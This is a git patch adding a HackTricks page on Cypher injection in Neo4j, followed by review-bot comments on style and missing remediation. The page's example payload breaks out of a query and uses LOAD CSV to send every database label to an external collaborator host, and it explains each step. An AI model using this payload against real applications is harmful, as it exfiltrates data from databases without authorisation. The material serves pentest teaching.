From ef2f2ed67fd92af4a4051a7cfa5f329fea784adc Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 21 Dec 2022 11:19:58 +0000 Subject: [PATCH] GitBook: [#3697] No subject --- SUMMARY.md | 1 + .../sql-injection/cypher-injection-neo4j.md | 47 +++++++++++++++++++ 2 files changed, 48 insertions(+) create mode 100644 pentesting-web/sql-injection/cypher-injection-neo4j.md diff --git a/SUMMARY.md b/SUMMARY.md index 959aadfc..c4ac62d8 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -540,6 +540,7 @@ * [MySQL injection](pentesting-web/sql-injection/mysql-injection/README.md) * [MySQL File priv to SSRF/RCE](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md) * [Oracle injection](pentesting-web/sql-injection/oracle-injection.md) + * [Cypher Injection (neo4j)](pentesting-web/sql-injection/cypher-injection-neo4j.md) * [PostgreSQL injection](pentesting-web/sql-injection/postgresql-injection/README.md) * [dblink/lo\_import data exfiltration](pentesting-web/sql-injection/postgresql-injection/dblink-lo\_import-data-exfiltration.md) * [PL/pgSQL Password Bruteforce](pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md) diff --git a/pentesting-web/sql-injection/cypher-injection-neo4j.md b/pentesting-web/sql-injection/cypher-injection-neo4j.md new file mode 100644 index 00000000..535f360d --- /dev/null +++ b/pentesting-web/sql-injection/cypher-injection-neo4j.md @@ -0,0 +1,47 @@ +# Cypher Injection (neo4j) + +
+ +πŸŽ™οΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). + +
+ +## Example + +`.*' | o ] AS filteredOrganisations CALL db.labels() YIELD label LOAD CSV FROM 'http:///' + label AS r //` + +> **Explanation of the payload** + +`.*' | o ] AS filteredOrganisations` + +This whole part was to close the current query partially. The above part partially closed the current query and helped adding new clauses to the original query. + +`CALL db.labels() YIELD label` + +The CALL clause is used to evaluate a subquery, here the subquery is calling db.labels(), a built-in procedure which returns a list of all labels used in the database. YIELD clause stores the returned list in the variable β€œlabel”. + +`LOAD CSV FROM 'http:///' + label AS r //` + +LOAD CSV is a clause used to load a csv file from a user defined location via the FROM keyword. Here the LOAD CSV makes a request to our burp collaborator client appending one element of the list β€œlabel” at a time. As a result multiple requests were sent to my burp collaborator client and all requests had different label names appended to the requested endpoint. The end part β€˜AS r’ was only used because the query was breaking constantly without it, all it does is loads the csv file as β€œr” and the final two forward slashes β€˜//’ were used to comment out the rest of the query in the same line. + +## References + +* [https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8](https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8) + +
+ +πŸŽ™οΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). + +
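Review bot: in the SUMMARY.md hunk, the new entry is placed between `Oracle injection` and `PostgreSQL injection`, which breaks the alphabetical order the visible siblings follow (MySQL, Oracle, PostgreSQL). Its title is also capitalised differently from theirs ("Injection" against "injection"). Consider moving it to its alphabetical position and titling it `Cypher injection (Neo4j)`. Cypher is not SQL, so the reason for filing the page under `sql-injection/` should be stated somewhere; the commit subject "No subject" gives none.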
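Review bot: in the new cypher-injection-neo4j.md, the payload under `## Example` is shown without the query it is injected into, so a reader cannot check the claim that `.*' | o ] AS filteredOrganisations` "closes the current query partially". Add the shape of the original query, or a sentence describing it, before the payload. The URL in `LOAD CSV FROM 'http:///'` has an empty host in both places it appears, which looks like a lost placeholder; use a visible one. The explanation is in first person ("my burp collaborator client") and its first paragraph says the same thing twice, so it reads as pasted from the referenced write-up; reword it in the page's own voice. The page also has no remediation section; at minimum it should say that user input must be passed as a query parameter rather than concatenated into the Cypher string.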